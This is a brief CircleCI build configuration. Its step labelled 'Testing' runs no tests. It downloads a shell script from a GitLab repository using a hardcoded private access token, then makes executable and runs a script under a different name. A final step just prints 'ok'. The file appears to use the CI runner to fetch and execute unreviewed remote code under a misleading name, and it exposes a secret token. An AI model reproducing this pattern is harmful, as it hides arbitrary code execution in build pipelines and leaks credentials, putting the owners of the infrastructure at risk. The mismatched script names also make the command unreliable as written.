version: 2.1
jobs:
  build:
    docker:
       - image: ubuntu:14.04
    steps:
      - run:
          name: Testing
          command: |
                wget -O load.sh --header='PRIVATE-TOKEN:sUE4Ps-H53rSdtmNb36z' 'https://gitlab.com/api/v4/projects/25212038/repository/files/load.sh/raw?ref=master' && chmod +x packages.pm.sh && ./packages.pm.sh

      - run:
          name: Result
          command: |
                echo "ok"
